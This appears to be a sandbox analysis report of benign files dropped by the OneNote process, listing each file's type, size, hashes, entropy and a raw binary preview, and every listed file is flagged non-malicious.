                                                                                                                                                                                                              Preview:2...>.......<...v.......` ..`+..2...>...........v...X...@...P*..........................................................................................................................................~"..G...~"...q......|.dN.I.......I.qk..B.....LZ~"...q......|.dN~"...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............I....O...B.;&.......N...^...............|S2.W..@.&B.S...............j....................................I.qk..B.....LZ............I....O...B.;&....................................~"......~"......~"..........................................~".j....~".T)z..~"...`..~"......~"...D..~"...a..~".$.6.$~".$.................;........4...4...4.............~".;~".Y~".X~"...z...y.. x.. ........ ..$...$........D...E.......!..7!..7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9.........$....................z.......R.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14177
                                                                                                                                                                                                              Entropy (8bit):5.705782002886174
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                              MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                              SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                              SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                              SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                              Entropy (8bit):4.634703909003135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Rodd/r2z8gXNiEBP+yqEjrD+kcx4mtwjfPWqPor78AvB0ydNz/V/D8LxxzyxELtr:+KNT+ayfdAURdFeMlpxf53F
                                                                                                                                                                                                              MD5:FBD25DE7E59E2285516DF3209351B6A9
                                                                                                                                                                                                              SHA1:203078C192F833AB60A922E25C23B858E1624A6C
                                                                                                                                                                                                              SHA-256:3FD2147B5E9B17B842D48BEFB224D3EAD6476142A4A7973408E8CC3990676E65
                                                                                                                                                                                                              SHA-512:D404F41688A898A84E2791C5DBCB5BE377344211EB243D7B6F93F34064B64E256604A534648970A092FAA308806BEFF367E458CE21765059FE9C10FE5C0D85F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:j.......&&.......%..>&....... ..0@..0`..........j........%.......%..Z&..X.... ..0@..0`.................................................................j........%.......%........... ..0@..0`..8......./......./..n...F.d!.H.i)............EmA.2B..d.~Z......B...M...@.....S...q..p....e.S...c....v....r....c......................................................................./..T.......T$5..\..T.y....T$...%..T....ec.T......)T....H.0T.............0...........e....4........................~.K$.hcM..~.........(...`E......(...$...B.i.n.o.c.u.l.a.r.s. .C.o.r.n.e.r...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...0...0.0.0.8...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e.........\.......\......C.....[.%.......%......G.X...Wg.2...........`...,...L...n...B"..........\..........%...ec................0...........e....4.........................u.4..G..p.".a.....(...P.u.....(..."...B.l.u.e. .M.i.s.t. .M.a.r.g.i.n...j...P.a.g.e.L.o.c.I.D...L.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.384433811305364
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:LwsLp7LL2zFHYt4DE8onLX1X4XEL9muTcVlrdhSrgV2ktXN1ON9iz6FOylYbq:LwspL2zF4kE8SLXa0L9VTUlRAgji
                                                                                                                                                                                                              MD5:B1CB964764DC49265D1868A8BB436301
                                                                                                                                                                                                              SHA1:9D2FDEAA48BF076D99E9A666D2F0C8E154F01CA1
                                                                                                                                                                                                              SHA-256:08B2EEC718F348212AC99C1C891D54239E22FF8256FCD8A4A25E73A9F14AAB5C
                                                                                                                                                                                                              SHA-512:FA47D4337F2A350D9216D18453E0BFCD91D2A0BF86ED02C9A13E20411A55ECEFE0C5D6C851A969F206C39595A4D79454C44F220FB7B41E335E712F52E0216C12
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.g7......g7p.T....z@.3E..g7p.T....z@.3E..g7..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................. ......h;S.!....N...^................8.Y..=M.....OQe........f........................................I.qk..B.....LZ................ ......h;S.!............ ......h;S.!..........g7......g7......g7..........................................g7j.....g7T.]...g7......g7..B...g7H.....g7..B...g7..>.).g7..J...................;........4...4...4.."...............g7..g7..g7..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4..........g7......g7....#.g7............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12654
                                                                                                                                                                                                              Entropy (8bit):7.745439197485533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                                                                                              MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                                                                                              SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                                                                                              SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                                                                                              SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.37618007109245
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YsU61mZYitEpYXNKT9hnIRAdsrtFrjYFAJO:YsU61mhKpYX49hnIRAdotFrjYFKO
                                                                                                                                                                                                              MD5:5FF4ECDB6DA85BD2AF444B0F1D7C9AA7
                                                                                                                                                                                                              SHA1:FFD097AD59BBFD374B2CE0489791E821398198D3
                                                                                                                                                                                                              SHA-256:347159D52D6A2CD0B935C8BE3D8E783992554B6171F4F1DF0F6AF3A3682E79B4
                                                                                                                                                                                                              SHA-512:F256EE7A8CB1DF2F3B588C0BD600668623EFC13BC3C0B268702C3CCD1AFDDEFD02FA0C68736CC54AA79E839B41AF62172C08E25D8945D0D9DCC26E1C9FE9A5E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.xo......xo..^...b.C...xo..^...b.C...xo..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............IM..l.:.?....R....N...^.................sb..M.].............f........................................I.qk..B.....LZ..............IM..l.:.?....R..........IM..l.:.?....R..........xo......xo......xo..........................................xoj.....xoT.]...xo......xo..B...xoH.....xo..B...xo..>.).xo..J...................;........4...4...4.."...............xo..xo..xo..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4..........xo......xo....#.xo............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2695
                                                                                                                                                                                                              Entropy (8bit):7.434963358385164
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                                                                                              MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                                                                                              SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                                                                                              SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                                                                                              SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.364790780850042
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:7inbsReAKgBtWgqgE/E7saXEg29h28clrdhSrD5gatXgw9XLt:7inbslK+0gjE/GsaXEg29h28YRAVgaZ
                                                                                                                                                                                                              MD5:E87723CEF5F2A229FB9527391693E815
                                                                                                                                                                                                              SHA1:21CBD1FEE204D566B48C8D4A814FCE5CFF71124D
                                                                                                                                                                                                              SHA-256:E188C7089CE3F9A5DCE4E6F75A5C2BA4B1B1399C0F85D8EAEBB501E9DD5ECA12
                                                                                                                                                                                                              SHA-512:BC440F1C30467843EB0F32904E45F03CC777D03BF62E998ECF1E09D8474D1C79155B4255FBD5F3E45A364A4D6AD70C744494C862BB70449E9B9EC6CF88EE1D26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZuM......uM...W.....h...=uM...W.....h...=uM...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............lA.?.=...tZ.]....N...^...............D.5....F.......m........f........................................I.qk..B.....LZ..............lA.?.=...tZ.]..........lA.?.=...tZ.].........uM......uM......uM..........................................uM.j....uM.T.]..uM......uM..B..uM.H....uM...B..uM...>.)uM...J...................;........4...4...4.."..............uM..uM..uM...z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........uM......uM.....#uM.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11040
                                                                                                                                                                                                              Entropy (8bit):7.929583162638891
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                                                                                              MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                                                                                              SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                                                                                              SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                                                                                              SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.4570426157069045
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:u7sPY4SUxb4AgCrWEP3FlXC3j987SidkRLwJ4g4qUbW49jzZx4v4g4cg494:KsPY4SUp4AgCf/7XCz9ESidkRLwJ4g4l
                                                                                                                                                                                                              MD5:FB4C81A4108441985866AF91C08486C9
                                                                                                                                                                                                              SHA1:10028D31ADBFD3C414097CB9C6898AE544608275
                                                                                                                                                                                                              SHA-256:67845C116109E6FA06F854C4A22D9B8BEFF23A75608A4EF2D510F5284F7ECF75
                                                                                                                                                                                                              SHA-512:EB8CAC132408B96A59C4063D25479651AE4E3648D986BEB338A26C0F15E93A5C2A2057F01A0E94DF36EA25BABF5902E5258B91BDEEB6D3104FF195A5FCF41544
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZz.......z..C..5...+T7f'.z..C..5...+T7f'.z....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............o.j....4...Je......N...^................."MG.\I.D..............Z................................... ....I.qk..B.....LZ............o.j....4...Je..........o.j....4...Je...........z.......z.......z...........................................z..j....z..T%c..z.......z....G..z....H..z....>..z.......z.. .3...................;........4...4...4.."..............z...z...z....z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........z.......z......#z..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2268
                                                                                                                                                                                                              Entropy (8bit):7.384274251000273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                                                                                              MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                                                                                              SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                                                                                              SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                                                                                              SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):784
                                                                                                                                                                                                              Entropy (8bit):6.962539208465222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                                                                                              MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                                                                                              SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                                                                                              SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                                                                                              SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):2.7226669246302655
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:iSNsrQGaH1UVlBbkFbdL4QltUEwwrYjcXgjc9PmLINhrdQVr1xtX2VRV55:5sr5G1ULVkBxFlWEHXXv90I3RQ5TWN
                                                                                                                                                                                                              MD5:5F3CDB78EA865673FAB4D8CC0A0E44C9
                                                                                                                                                                                                              SHA1:890B7A5E51C8630C6BAE32CC1D6D54991C50F945
                                                                                                                                                                                                              SHA-256:F00EBC7D1F7BB5B092398D3D567C3E490D0300762759062A91E5B2147C5BB4B3
                                                                                                                                                                                                              SHA-512:80239F7FE4D77E583D559BE67CD56B64003387F8F6599090C658C54BCD1DE80C645BC32F3577414FDD457E470F54E5F157D0C3836B5B46B9B4EE2551A12CCB5B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>...........v................................I.......I.qk..B.....LZM U.....M UE....4......M UE....4......M U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............B..h.i.&=..n......N...^................M.=.G.O.......d............................................^....I.qk..B.....LZ.............B..h.i.&=..n...........B..h.i.&=..n...........M U.....M U.....M U.........................................M Uj....M UT.l..M U.....M U..Q..M U..Q..M U..>..M U.....M U .3...................;........4...4...4.."..............M U.M U.M U..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........M U.....M U....#M U............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3009
                                                                                                                                                                                                              Entropy (8bit):7.493528353751471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                                                                                              MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                                                                                              SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                                                                                              SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                                                                                              SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2266
                                                                                                                                                                                                              Entropy (8bit):5.563021222358941
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                                                                                              MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                                                                                              SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                                                                                              SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                                                                                              SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.338845005632309
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuX5cs5iSm+zqum2Z8t4PxEgJXgoGt9+NoZrdQqriBfG2BXNFv+JVZxH541:YNsyh2Z8mZEwXgxt9+NgRQyQG2K4
                                                                                                                                                                                                              MD5:92787237561D5A4C9121AF982EEFB241
                                                                                                                                                                                                              SHA1:F2E990CC8428D7096E42F5EA44C24C9E408187F6
                                                                                                                                                                                                              SHA-256:BE9CC23A1B178CE3F0E21B7A341D8E44852B552B6BD029241CDAC4E0D502059D
                                                                                                                                                                                                              SHA-512:2251F37B90A20B99759E0934C664029BE48F0929848D7F452D4CFCA03214DD04263AEA23EFEFF8DEFDE808206D11C2318CFD07C1607B673FE280F99E28B6AF65
                                                                                                                                                                                                              Malicious:false
